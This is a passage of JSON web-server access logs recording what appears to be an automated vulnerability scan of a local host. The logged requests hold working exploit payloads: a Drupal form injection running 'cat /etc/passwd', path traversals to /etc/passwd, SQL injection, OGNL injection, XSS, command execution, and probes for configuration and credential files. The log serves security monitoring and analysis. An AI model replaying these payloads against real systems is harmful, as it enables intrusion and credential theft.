name=\x22mail[#post_render][]\x22\x0D\x0A\x0D\x0Apassthru\x0D\x0A-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22mail[#type]\x22\x0D\x0A\x0D\x0Amarkup\x0D\x0A-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22mail[#markup]\x22\x0D\x0A\x0D\x0Acat /etc/passwd\x0D\x0A-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22form_id\x22\x0D\x0A\x0D\x0Auser_register_form\x0D\x0A-----------------------------99533888113153068481322586663\x0D\x0AContent-Disposition: form-data; name=\x22_drupal_ajax\x22\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.352","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"127.0.0.1/user/register", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.274","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /adm/file.cgi?next_file=%2fetc%2fpasswd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.269","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.269","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"28fHqUFxT1fPq0xBwXPejNKgSaq.txt\x0D\x0Adixell-xweb500-filewrite","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /cgi-bin/logo_extra_upload.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.685","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_3/welcome.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.340","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET //https:example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.362","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /keycloak.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.396","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/sys HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.375","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bolt/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.692","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v2/api/graphql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.271","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:03 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.297","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /version HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.273","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webconsole/webpages/login.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.273","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.383","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.384","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/48 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.410","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"ant=echo md5(\x22antproxy.php\x22);","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /.antproxy.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.412","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.115","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /modules/babel/redirect.php?newurl=http://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.432","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.docker/config.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.436","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /include/nuclei.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.148","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-config.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.344","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"{\x22query\x22:\x22query {\x5Cn __schema {\x5Cn directive\x5Cn }\x5Cn}\x22,\x22variables\x22:null}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.361","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.374","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(28fHqYlU7hHUxSRcoP35pL7Il9R)) HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.266","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /info/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.287","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /kylin/api/admin/config HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.285","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.805","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /v1.24/version HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.377","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /userportal/webpages/myaccount/login.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.375","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.295","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bower.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.303","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /pages/createpage.action?spaceKey=myproj HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.128","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /logo/28fHqUFxT1fPq0xBwXPejNKgSaq.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.748","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET //http://127.0.0.1example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.733","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.wp-config.php.swp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.345","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.345","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jolokia/search/*:test=test HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.401","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /check_mk/login.py HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.395","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login=","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /zms/admin/index.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.858","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1/zms/admin/index.php", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.274","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.361","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.342","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.286","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /login.htm HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.311","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /stat.jsp?cmd=chcp+437+%7c+dir HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.312","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ibmmq/console/login.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.277","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/49 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.640","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /names.nsf/People?OpenView HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.369","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET //%E3%80%B1example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.248","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-config-sample.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.273","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wan.htm HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.291","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /pages/templates2/viewpagetemplate.action HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.352","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ueditor/php/getRemoteImage.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.533","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/search/*:test=test HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.356","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v2/explorer HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.106","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /etc.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.104","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:04 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET 